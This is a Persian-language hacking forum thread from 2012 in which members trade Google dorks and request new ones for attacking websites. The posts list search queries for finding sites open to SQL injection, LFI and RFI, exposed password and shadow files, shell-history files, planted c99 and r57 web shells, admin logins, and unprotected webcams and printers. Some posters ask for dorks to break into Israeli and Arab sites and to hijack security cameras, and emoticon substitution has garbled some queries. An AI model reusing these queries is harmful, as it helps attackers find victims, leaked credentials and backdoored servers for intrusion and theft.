"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

meysambox
01-06-2012, 09:55 PM
دوستان ادامه بدید دیگه
ممنونم

adonis27
01-22-2012, 12:07 AM
دورک dnn میخوام کسی نداره؟

sssssm
01-23-2012, 06:32 AM
Password Hacking ،
Priv8


filetype:htpasswd htpasswd
intitle:"Index of .htpasswd -intitle:"dist -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurlPfftasslist.txt (para encontrar listas de passwords)
intitle:"Index of..etc passwd
intitle:admin intitle:login
Incorrect syntax near (SQL script error)
intitle:"the page cannot be found inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
Supplied arguments is not a valid PostgreSQL result (possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
Index of /backup
index.of.password
index.of.winnt

inurl:"auth_user_file.txt
Index of /admin
Index of /password
Index of /mail
Index of / +passwd
Index of / +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: index of/admin
allintitle: index of/root
allintitle: sensitive filetypeGrinoc
allintitle: restricted filetype :mail
allintitle: restricted filetypeGrinoc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurlPfftasswd filetype:txt
inurl:admin filetypeGrinb
inurl:iisadmin
inurl:"auth_user_file.txt
inurl:"[Only registered and activated users can see links]*.
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of .sh_history
intitle:"Index of .bash_history
intitle:"Index of passwd
intitle:"Index of people.1st
intitle:"Index of pwd.db
intitle:"Index of etc/shadow
intitle:"Index of spwd
intitle:"Index of master.passwd
intitle:"Index of htpasswd
intitle:"Index of members OR accounts
intitle:"Index of user_carts OR user _cart

-==[Hackers Favourite Keywords in google.]

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetypeGrinoc
allintitle: restricted filetype :mail
allintitle: restricted filetypeGrinoc site:gov
inurlasswd filetype:txt
inurl:admin filetypeGrinb
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"[Only registered and activated users can see links]*."

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

custom search
01-23-2012, 07:31 AM
دورک dnn میخوام کسی نداره؟
inurl:"/portals/0/" 8-x
site:com inurl:"portals/0/" 8-x
site:net inurl:/Default.aspx?tabid=
site:nl inurl:/tabid/ AND Default.aspx
site:com inurl:/tabid/ AND /language/en-US/Default.aspx
site:com inurl:/dnn/tabid/ AND Default.aspx

adonis27
01-28-2012, 03:19 AM
دورک webdaw ندارین؟

adonis27
01-28-2012, 01:36 PM
دورک webdaw ندارین؟

دورک میخوام

SNMP
02-03-2012, 07:26 PM
یه سری درک جدید از یه سایت خارجی پیدا کردم نمونه هاش تو اشیانه کمه...حداقل من ندیدم...

HashoR
02-06-2012, 12:19 PM
دورک webdaw ندارین؟


دورک میخوام

دوست من کسی داشته باشه میزاره، و دیگه نیازی به اسپم نیست............




The BesT Drok & priv8:



inurl:1.txt/home/


نمونه بدست آمده:
[Only registered and activated users can see links]

استفاده ها :
میشه کافینگ ها رو خوند، اسکریپت ها رو دانلود کرد ، دنبال بکاپ ها گشت و ..........

موفق باشید....
ها///ور
ما را چه به اینــــــــــــــــــــــ ــــــــــــ حرفا...!

منبع: Ashiyane Digital Security Team

تشــــــــــــــــــکر نشانه رضایت است.

HashoR
02-06-2012, 12:20 PM
جدیدترین دروک های RFI :


/_functions.php?prefix=
/cpcommerce/_functions.php?prefix=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/ashnews.php?pathtoashnews=
/eblog/blog.inc.php?xoopsConfig***91;xoops_url***93;=
/pm/lib.inc.php?pm_path=
/b2-tools/gm-2-b2.php?b2inc=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/includes/include_once.php?include_file=
/e107/e107_handlers/secure_img_render.php?p=
/shoutbox/expanded.php?conf=
/main.php?x=
/myPHPCalendar/admin.php?cal_dir=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/includes/include_onde.php?include_file=
/index.php?page=
/index.php?pg=
/index.php?show=
/index.php?cat=
/index.php?file=
/db.php?path_local=
/index.php?site=
/htmltonuke.php?filnavn=
/livehelp/inc/pipe.php?HCL_path=
/hcl/inc/pipe.php?HCL_path=
/inc/pipe.php?HCL_path=
/support/faq/inc/pipe.php?HCL_path=
/help/faq/inc/pipe.php?HCL_path=
/helpcenter/inc/pipe.php?HCL_path=
/live-support/inc/pipe.php?HCL_path=
/gnu3/index.php?doc=
/gnu/index.php?doc=
/phpgwapi/setup/tables_update.inc.php?appdir=
/forum/install.php?phpbb_root_dir=
/includes/calendar.php?phpc_root_path=
/includes/setup.php?phpc_root_path=
/inc/authform.inc.php?path_pre=
/include/authform.inc.php?path_pre=
index.php?nic=
index.php?sec=
index.php?content=
index.php?link=
index.php?file****=
index.php?dir=
index.php?********=
index.php?view=
*.php?sel=
*.php?session=&content=
*.php?locate=
*.php?place=
*.php?layout=
*.php?go=
*.php?catch=
*.php?mode=
*.php?****=
*.php?loc=
*.php?f=
*.php?inf=
*.php?pg=
*.php?load=
*.php?naam=
all/index.php?page= site:*.ru
all/index.php?file= site:*.ru


موفق باشید....:دی
ها///ور

nilgon
02-13-2012, 02:05 AM
prive8 2011

allinurl:.gt/contenido.php?id= or intext:Powered by NeBSGT

nilgon
02-13-2012, 02:20 AM
'inurl:"editors/FCKeditor/editor/filemanager"'

[Only registered and activated users can see links][target]/[path]/editors/FCKeditor/editor/filemanager/browser/default/browser.html
[Only registered and activated users can see links][target]/[path]/editors/FCKeditor/editor/filemanager/browser/default/frmupload.html


prive8 2011

divonatamjiji
02-17-2012, 11:41 PM
Dorks for finding shells

]
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”

“Shell” filetype:php intext:”uname -a:” “EDT 2010″

intitle:”intitle:r57shell” [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]

inurl:”c99.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:”c100.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

intitle:”Shell” inurl:”.php” & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Updat

c99shell
02-21-2012, 04:44 AM
چند تا dork جدید برای Inject میخواستم رو اینایی که هست هر چی تست کردم جواب نداد
البته من تست اسیب پذیری رو با ( ' ) انجام میدم

مرسی

TumrusBy
05-17-2012, 08:30 PM
چند تا dork برای نفوذ به سایت های اسرائیل و عربی میخواستم کسی داره تازه باشه ااا ممنون

MaleFactor
05-18-2012, 03:01 AM
[RIGHT]
چند تا dork برای نفوذ به سایت های اسرائیل و عربی میخواستم کسی داره تازه باشه ااا ممنون

هر دورک مناسب با خودشو نداره شما کافیه جلوی دورک مورد نظر پسوند دلخواههتونو بزارید مثلا
inurl:".il"
"inurl:".ar

hossein19123
05-23-2012, 12:27 AM
اینم یه دورک خوب برای آپلود :cool:


inurl:ft2.php intext:upload

hossein19123
05-31-2012, 01:43 PM
اینم یه دورک خوبه دیگه اگر خواستید بگید اموزششو بزارم


intitle:Moxiecode file browser filetype:php

maghsom10
06-01-2012, 06:35 PM
اینم یه دورک خوبه دیگه اگر خواستید بگید اموزششو بزارم


intitle:moxiecode file browser filetype:php

سلام

اكه ميشه فيلم اموزشي رو هم بزار ممنونننننننننننن

hossein19123
06-05-2012, 06:05 PM
inurl:"/index.php?option=com_content" "Choose a File to Upload"

.exe
06-05-2012, 06:31 PM
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

D4gH00N
06-07-2012, 11:46 AM
دوتا از جدیدترین دورک های sqli :

inurl:"*.php?*=*.php" intext:"warning: Include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"

inurl:"tiki-index.php" filetype:php "this is tikiwiki 1.9"

mshoping
06-08-2012, 05:58 PM
یه فایل هم بنده آپ کردم دوستان استفاده کنند :35:

abadis
06-08-2012, 06:19 PM
یه سوال ::
جایی - سایتی هست که دورک های جدید رو بزاره؟

بله هستن.برای مثال
[Only registered and activated users can see links]

jok haker
06-09-2012, 03:22 AM
یه سری دورک 2012 میزارم...

بعد از مدت ها...:47:

امیدوارم خوشتون بیاد ...

یا حق...

GENZO256
06-09-2012, 12:15 PM
چندتا جدید:

کانفیگ سرور
intext:"~~Joomla1.txt" title:"Index of /"

پیدا کردن سی ام اس

"Welcome to Sitecore" + "License Holder"

hossein19123
06-13-2012, 04:59 PM
اینم چند تا دورک برای بچه های گل


Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

اینم exploit ش



Exploit :
/editor/filemanager/connectors/test.html

llllSllll
06-13-2012, 05:42 PM
Dork: SQL Injection
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

kingback
06-13-2012, 05:57 PM
یه سری دورک Pri8 نایاب میذارم....امیدوارم خوشتون بیاد



filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"

avernus
06-15-2012, 12:12 AM
سلام اینم یه سری دورک جدید برای هک کردن دوربین های امنیتی آنلاین(view and control security cameras):79:

تشکر...:cool:

kingback
06-16-2012, 01:11 PM
سلام اینم یه سری دورک جدید برای هک کردن دوربین های امنیتی آنلاین(view and control security cameras):79:

تشکر...:cool:


عزیزم این تاپیک برای دورک های مربوط به باگ هست نه.....



بهتر نبود قبل از پست دادن عنوان تاپیک را نگاه کنی؟؟؟؟؟



گلچینی از بهترین Priv8 Dorks مخصوص انواع باگهای SQLi,LFI,DNN,...



تاپیک مفیدی هست خواهشا الکی خرابش نکنید...


یا حق

NTFS
06-26-2012, 01:59 PM
اینم دورک های LFI DORKS
بزن تشکر قشنگرو..


---LFI DORKS---------------------
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:act=
inurl:action=
inurl:API_HOME_DIR=
inurl:board=
inurl:cat=
inurl:client_id=
inurl:cmd=
inurl:cont=
inurl:current_frame=
inurl:date=
inurl:detail=
inurl:dir=
inurl:display=
inurl:download=
inurl:f=
inurl:file=
inurl:fileinclude=
inurl:filename=
inurl:firm_id=
inurl:g=
inurl:getdata=
inurl:go=
inurl:HT=
inurl:idd=
inurl:inc=
inurl:incfile=
inurl:incl=
inurl:include_file=
inurl:include_path=
inurl:infile=
inurl:info=
inurl:ir=
inurl:lang=
inurl:language=
inurl:link=
inurl:load=
inurl:main=
inurl:mainspot=
inurl:msg=
inurl:num=
inurl:openfile=
inurl:p=
inurl:page=
inurl:pagina=
inurl:path=
inurl:path_to_calendar=
inurl:pg=
inurl:qry_str=
inurl:ruta=
inurl:safehtml=
inurl:section=
inurl:showfile=
inurl:side=
inurl:site_id=
inurl:skin=
inurl:static=
inurl:str=
inurl:strona=
inurl:sub=
inurl:tresc=
inurl:url=
inurl:user=
inurl:ajax.php?page=

NTFS
06-26-2012, 02:07 PM
اینم دورک مخصوص کار با HTML Injection


inurl:"id=" & intext:"warning: mysql_fetch-assoc()
inurl:"id=" & intext:"warning: mysql_fetch-array()
inurl:"id=" & intext:"warning: mysql_num_rows()
inurl:"id=" & intext:"warning: session_satrt()
inurl:"id=" & intext:"warning: getimagesize()
inurl:"id=" & intext:"warning: is_writable()
inurl:"id=" & intext:"warning: unknown()
inurl:"id=" & intext:"warning: mysql_result()
inurl:"id=" & intext:"warning: pg_exec()
inurl:"id=" & intext:"warning: mysql_query()
inurl:"id=" & intext:"warning: array_merge()
inurl:"id=" & intext:"warning: preg_match()
inurl:"id=" & intext:"warning: ilesize()
inurl:"id=" & intext:"warning: filesize()
inurl:"id=" & intext:"warning: require()

The Dark Hacker
07-05-2012, 10:48 PM
اینم چند تا دورک توپ و پرایوت برای ادمین بایپس


allinurl:index.php?db=information_schema
allinurl:index.php?db=test
inurl:wp-content/plugins/age-verification/age-verification.php
inurl:"/showPlayer.php?id=" intext:"powered by ellistonSPORT
inurl:mod.php?mod=blog" intext:"powered by DIY-CMS
inurl:cgi-bin/cosmobdf.cgi?
allintext:D.N.I filetype:xls
(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log
inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp
intitle:SpectraIV-IP
Powered by kryCMS
inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp


:88:

The Dark Hacker
07-21-2012, 04:40 PM
با سلامی دوباره

اینم از آرشیو دورک من از باگ lfi :45:

تقریبا همش جدید هست(1150 تا:99:)

موفق باشید

The Dark Hacker
08-10-2012, 10:03 PM
سلام دوستان
این تاپیک خوبیه چرا پس خوابیده؟؟:cool:

برای بالا اومدن تاپیک من 20 تا دورک باگ LFD میزارم

یا علی./

GNU Linux
09-07-2012, 04:31 PM
سلام به بچه های گل آشیانه و مدیران و تازه کاران عزیز
این مجموعه رو که براتون میرارم داغ داغ که شامل بیشتر از 4500 دورک جدید sql می باشد که مال سال 2012 می باشد.
امیدوارم همیشه موفق باشید\\\:23:
تشکر یادتون نره!!!!

hossein19123
09-28-2012, 12:37 AM
اینم دورک های جدید sql



inurl:index.php?SellerID=
inurl:supplier/index.php

milad0871
10-02-2012, 05:18 PM
دیدم دوستان در دسترسی به دیتا بیس عاجز هستن تصمیم گرفتم ۱ دورک Private بذارم

با این دورک میتونید به دیتا بیس دسترسی داشته باشید



allinurl:index.php?db=information_schema

موفق باشید

توی آشیانه از دنیا نری بلند صلوات بعدش تشکر

u0il
11-01-2012, 04:25 AM
(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")

(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")

"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )

"Please re-enter your password It must match exactly"

inurl:"tmtrack.dll?"

inurl:polly/CP

intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login

intitle:MyShell 1.1.0 build 20010923

intitle:"YALA: Yet Another LDAP Administrator"

intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"

inurl:"phpOracleAdmin/php" -download -cvs

PHPKonsole PHPShell filetype:php -echo

filetype:php HAXPLORER "Server Files Browser"

inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx

(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")

intitle:"Web Data Administrator - Login"

"adding new user" inurl:addnewuser -"there are no domains"

PHP Shell (unprotected)

Public PHP FileManagers

+htpasswd +WS_FTP.LOG filetype:log

intitle:admin intitle:login

=================
Files containing usernames

These files contain usernames, but no passwords... Still, google finding usernames on a web site...

site:extremetracking.com inurl:"login="

intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"

OWA Public folders & Address book

filetype:conf inurl:proftpd.conf -sample

filetype:log username putty

filetype:reg reg +intext:"internet account manager"

filetype:reg reg HKEY_CURRENT_USER username

+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"

inurl:php inurl:hlstats intext:"Server Username"

index.of perform.ini

"index of" / lck

inurl:admin filetype:asp inurl:userlist

inurl:admin inurl:userlist

sh_history files

bash_history files
=====================
Sensitive Directories

Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!

allintext:"WebServerX Server at"

intitle:index.of ios -site:cisco.com

intitle:index.of cisco asa -site:cisco.com

intitle:index.of.config

allintitle:"FirstClass Login"

inurl:install.pl intext:"Reading path paramaters" -edu

"Warning: Installation directory exists at" "Powered by Zen Cart" -demo

"Welcome to the directory listing of" "NetworkActiv-Web-Server"

log inurl:linklint filetype:txt -"checking"

"Directory Listing for" "Hosted by Xerver"

intitle:"pictures thumbnails" site:pictures.sprintpcs.com

intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder

intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff

intitle:index.of WEB-INF

intitle:index.of /maildir/new/

filetype:ini Desktop.ini intext:mydocs.dll

filetype:torrent torrent

"Index of" rar r01 nfo Modified 2004

"Web File Browser" "Use regular expression"

intitle:"HFS /" +"[Only registered and activated users can see links]"

intitle:upload inurl:upload intext:upload -forum -shop -support -w3c

intitle:"index of" inurl:ftp (pub | incoming)

allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"

intitle:index.of abyss.conf

intitle:"Index of /CFIDE/" administrator

"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )

intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org

intext:"Powered By: TotalIndex" intitle:"TotalIndex"

"intitle:Index.Of /" stats merchant cgi-* etc

intitle:"index of" intext:"content.ie5"

intitle:"index of" -inurl:htm -inurl:html mp3

index.of.dcim

intitle:"Directory Listing For" intext:Tomcat -int

intitle:"webadmin - /*" filetype:php directory filename permission

intitle:index.of (inurl:fileadmin | intitle:fileadmin)

intitle:"Index of *" inurl:"my shared folder" size modified

intitle:index.of /AlbumArt_

intext:"d.aspx?id" || inurl:"d.aspx?id"

intitle:index.of (inurl:fileadmin | intitle:fileadmin)

"index of" / picasa.ini

index.of.password
===============
intitle:"Live NetSnap Cam-Server feed"

axis storpoint "file view" inurl:/volumes/

inurl:"printer/main.html" intext:"settings"

intext:"MaiLinX Alert (Notify)" -site:networkprinters.com

"Copyright (c) Tektronix, Inc." "printer status"

inurl:"ipp/pdisplay.htm"

intext:"Videoconference Management System" ext:htm

intitle:"Smoothwall Express" inurl:cgi-bin "up * days"

intitle:"ipcop - main"

intitle:"EvoCam" inurl:"webcam.html"

"Starting SiteZAP 6.0"

inurl:axis-cgi

"intitle:Cisco Systems, Inc. *** 3000 Concentrator"

intext:"UAA (MSB)" Lexmark -ext:pdf

intext:"Ready with 10/100T Ethernet"

intitle:"Home" "Xerox Corporation" "Refresh Status"

WebControl intitle:"AMX NetLinx"

"please visit" intitle:"i-Catcher Console" Copyright "iCode Systems"

intitle:"toshiba network camera - User Login"

inurl:"level/15/exec/-/show"

site:.viewnetcam.com -[Only registered and activated users can see links]

intitle:"DVR Web client"

inurl:TiVoConnect?Command=QueryServer

inurl:netw_tcp.shtml

(inurl:webArch/mainFrame.cgi ) | (intitle:"web image monitor" -htm -solutions)

intitle:"my webcamXP server!" inurl:":8080"

camera linksys inurl:main.cgi

intitle:"DEFAULT_CONFIG - HP"

intitle:"switch home page" "cisco systems" "Telnet - to"

intitle:"axis storpoint CD" intitle:"ip address"

intitle:webeye inurl:login.ml

inurl:hp/device/this.LCDispatcher

Canon ImageReady machines

intitle:"lantronix web-manager"

intitle:RICOH intitle:"Network Administration"

Aficio 1022

Konica Network Printer Administration

("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"

intitle:"The AXIS 200 Home Page"

More Axis netcams !

intitle:"dreambox web"

Phasers 4500/6250/8200/8400

Canon Webview netcams

Xerox Phaser® 840 Color Printer

Xerox Phaser 8200

Xerox Phaser® 740 Color Printer

Xerox Phaser 6250

intitle:"BorderManager Information alert"

intitle:"Live View / - AXIS"

"powered by webcamXP" "Pro|Broadcast"

Panasonic WJ-NT104 netcams

Mobotix netcams

sony SNC-RZ20 network cameras

seyeon FlexWATCH cameras

sony SNC-RZ30 Network Cameras
=====================
Advisories and Vulnerabilities

These searches locate vulnerable servers. These searches are often generated from various secu- rity advisory posts, and in many cases are product or version-specific.

intext: Copyright+MantisBT Group

"Powered By PageAdmin CMS Free Version"

"powered by simpleview CMS"

"POWERED BY: WEBINSPIRE"

inurl:showcat.asp?id=

inurl:panorama-viewer.php?id=

inurl:com_amresurrected

"Powered by SOOP Portal Raven 1.0b"

inurl:page.php?intPageID=

intitle:PhpMyAdmin inurl:error.php

inurl:index.php?option=com_lqm "showResults"

"SOOP Portal 2.0"php Kolay Forum (php KF) © 2007 - 2010 phpKF Ekibi

"Powered By Dejcom Market CMS"

inurl:"index.php?option=com_annuaire"

inurl:index.php?option=com_doqment&cid=

inurl:"index.php?option=com_catalogue"

inurl:"index.php?option=com_storedirectory"

"Powered by SiteEngine"

inurl:"index.php?option=com_jeajaxeventcalendar"

"Site produced by GeneralProducts.co.uk"

inurl:"?act=phpinfo"

inurl:"?delete" +intext:"PHP version" +intext:"Safe_mode"

inurl:"jscripts/tiny_mce/plugins/tinybrowser/"

("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis

inurl:"index.php?ind=blog"

"powered by bitweaver"

"Powered by Shadowed Portal"

"Powered by Quick.Cart"

inurl:"com_sqlreport"

insite: SmarterMail Enterprise 7.1

"this site is using the webspell script (version: 4.01.02)"

inurl:wp-login.php Register Username Password -echo

"Page created in" "seconds by glFusion" +RSS

"powered by ThWboard"

"Powered by XMB"

"This web site was made with MD-Pro"

pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid CSS"

"powered by gcards"

intitle:"X7 Chat Help Center"|"Powered By X7 Chat"

"This is a Free & Open Source mailing list manager"

"powered by tikiwiki"

"This site is powered by e107"

inurl:imageview5

"Powered by sendcard - an advanced PHP e-card program"

"AlumniServer project"
============================

inurl:/img/vr.htm

inurl:Printers/ipp_0001.asp

intitle:"Snap Server" intitle:"Home" "Active Users"

intitle:"Sony SNT-V304 Video Network Station" inurl:hsrindex.shtml

Display Cameras intitle:"Express6 Live Image"

intitle:"Iomega NAS Manager" -ihackstuff.com

intitle:Cisco "You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator"

intitle:"Summit Management Interface" -georgewbush.org.uk

intitle:"SNOIE Intel Web Netport Manager" OR intitle:"Intel Web Netport Manager Setup/Status"

"This page is for configuring Samsung Network Printer" | printerDetails.htm

("port_255/home")|(inurl:"home?port=255")

intitle:"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603" intitle:"Live Images"

(intitle:"VisionGS Webcam Software")|(intext:"Powered by VisionGS Webcam") -showthread.php -showpost.php -"Search Engine" -computersglobal.com -site:g

intitle:"Biromsoft WebCam" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000

intitle:"Netcam" intitle:"user login"

intitle:"Orite IC301" | intitle:"ORITE Audio IP-Camera IC-301" -the -a

Phaser numrange:100-100000 Name DNS IP "More Printers" index help filetype:html | filetype: shtml

intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces

intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com

intitle:"INTELLINET" intitle:"IP Camera Homepage"

intitle:iDVR -intitle:"com | net | shop" -inurl:"asp | htm | pdf | html | php | shtml | com | at | cgi | tv"

"Summary View of Sensors" | "sensorProbe8 v *" | "

intitle:"HP ProCurve Switch *" "This product requires a frame capable browser."

intitle:"V1" "welcome to phone settings" password

intitle:"WEBDVR" -inurl:product -inurl:demo

u0il
11-01-2012, 04:34 AM
intitle:"SWW link" "Please wait....."

inurl:"port_255" -htm

intitle:"Freifunk.Net - Status" -site:commando.de

ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"

"Please use Netscape 2.0 or enhance !!" -site:dlink.com -site:ovislink.com.tw

intitle:"NeroNET - burning online"

Winamp Web Interface

intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"

inurl:JPGLogin.htm

"display printer status" intitle:"Home"

intitle:jdewshlp "Welcome to the Embedded Web Server!"

inurl:/en/help.cgi "ID=*"

intitle:"Lexmark *" inurl:port_0

intitle:"OfficeConnect Wireless 11g Access Point" "Checking your browser"

"Webthru User Login"

intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"

intitle:"BorderWare MXtreme Mail Firewall Login"

intitle:"Service Managed Gateway Login"

intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists

intitle:asterisk.management.portal web-access

intitle:HomeSeer.Web.Control | Home.Status.Events.Log

intitle:"active webcam page"

intitle:"Dell Laser Printer" ews

allintitle:Brains, Corp. camera

inurl:camctrl.cgi

intext:"Please enter correct password for Administrator Access. Thank you" "Copyright © 2003 SMC Networks, Inc. All rights reserved."

intitle:"supervisioncam protocol"

intitle:Linksys site:ourlinksys.com

intitle:"DEFAULT_CONFIG - HP"

intitle:"switch login" "IBM Fast Ethernet Desktop"

intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."

intitle:"Connection Status" intext:"Current login"

inurl:na_admin

intitle:"EpsonNet WebAssist Rev"

intitle:"EverFocus.EDSR.applet"

inurl:"8003/Display?what="

allinurl:index.htm?cus?audio

intitle:"Browser Launch Page"

intitle:"Network Print Server" intext:"[Only registered and activated users can see links]" filetype:shtm

intitle:"Setup Home" "You will need * log in before * * change * settings"

filetype:cgi transcoder.cgi

inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi

intitle:"SpeedStream * Management Interface"

intitle:"Sipura.SPA.Configuration" -.pdf

intitle:"Cayman-DSL.home"

intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"

intitle:"iVISTA.Main.Page"

inurl:":631/printers" -php -demo

intitle:"AudioReQuest.web.server"

intitle:"V-Gear BEE"
==========================

inurl:mewebmail

W-Nailer Upload Area

inurl:"typo3/index.php?u=" -demo

inurl:administrator "welcome to mambo"

ez Publish administration

intitle:"Tomcat Server Administration"

intitle:"Login - powered by Easy File Sharing Web

"Login to Usermin" inurl:20000

intitle:"TUTOS Login"

filetype:pl "Download: SuSE Linux Openexchange Server CA"

4images Administration Control Panel

intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"

inurl:"gs/adminlogin.aspx"

intitle:Login * Webmailer

Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *")

intitle:"ITS System Information" "Please log on to the SAP System"

Novell NetWare intext:"netware management portal version"

"powered by CuteNews" "2003..2005 CutePHP"

inurl:cgi-bin/ultimatebb.cgi?ubb=login

intitle:"please login" "your password is *"

Ultima Online loginservers

"WebSTAR Mail - Please Log In"

intitle:"teamspeak server-administration

inurl:/cgi-bin/sqwebmail?noframes=1

(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp)

intitle:Node.List Win32.Version.3.11

inurl:"utilities/TreeView.asp"

ASP.login_aspx "ASP.NET_SessionId"

Powered by INDEXU

u0il
